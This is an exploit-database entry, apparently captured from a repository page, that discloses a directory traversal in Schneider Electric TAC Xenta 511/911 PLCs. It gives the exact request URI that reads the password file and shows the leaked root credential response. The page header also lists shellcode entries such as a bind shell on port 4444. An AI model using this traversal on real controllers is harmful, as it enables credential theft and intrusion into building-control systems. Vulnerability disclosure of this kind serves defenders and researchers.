0f18636d14
9 changes to exploits/shellcodes Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion TAC Xenta 511/911 - Directory Traversal New STAR 2.1 - SQL Injection / Cross-Site Scripting PHP Dashboards NEW 5.5 - 'email' SQL Injection CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting Grid Pro Big Data 1.0 - SQL Injection Linux/x86 - EggHunter + access() Shellcode (38 bytes) Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes) Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)
32 lines
No EOL
731 B
Text
32 lines
No EOL
731 B
Text
# Exploit Title: TAC Xenta 511 and 911 Credentials Disclosure
|
|
# Date: 25.05.2018
|
|
# Exploit Author: Marek Cybul
|
|
# Vendor Homepage:
|
|
https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf
|
|
# Version: 5.17
|
|
|
|
# Schneider Electric TAC Xenta 911 and 511 PLCs
|
|
|
|
Directory traversal in help manuals allows for credentials extraction
|
|
|
|
Devices are not indexed by crawlers like Shodan or Censys due to
|
|
ancient SSL configuration,
|
|
needed to use old browser to support it (not even s_client, curl or
|
|
ncat could connect).
|
|
|
|
|
|
Example URI: /www/help/public/../../../sys/pswd
|
|
|
|
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
|
|
|
|
HTTP/1.0 200 OK
|
|
|
|
root
|
|
super user
|
|
/
|
|
/
|
|
/
|
|
password
|
|
0
|
|
900
|
|
3 |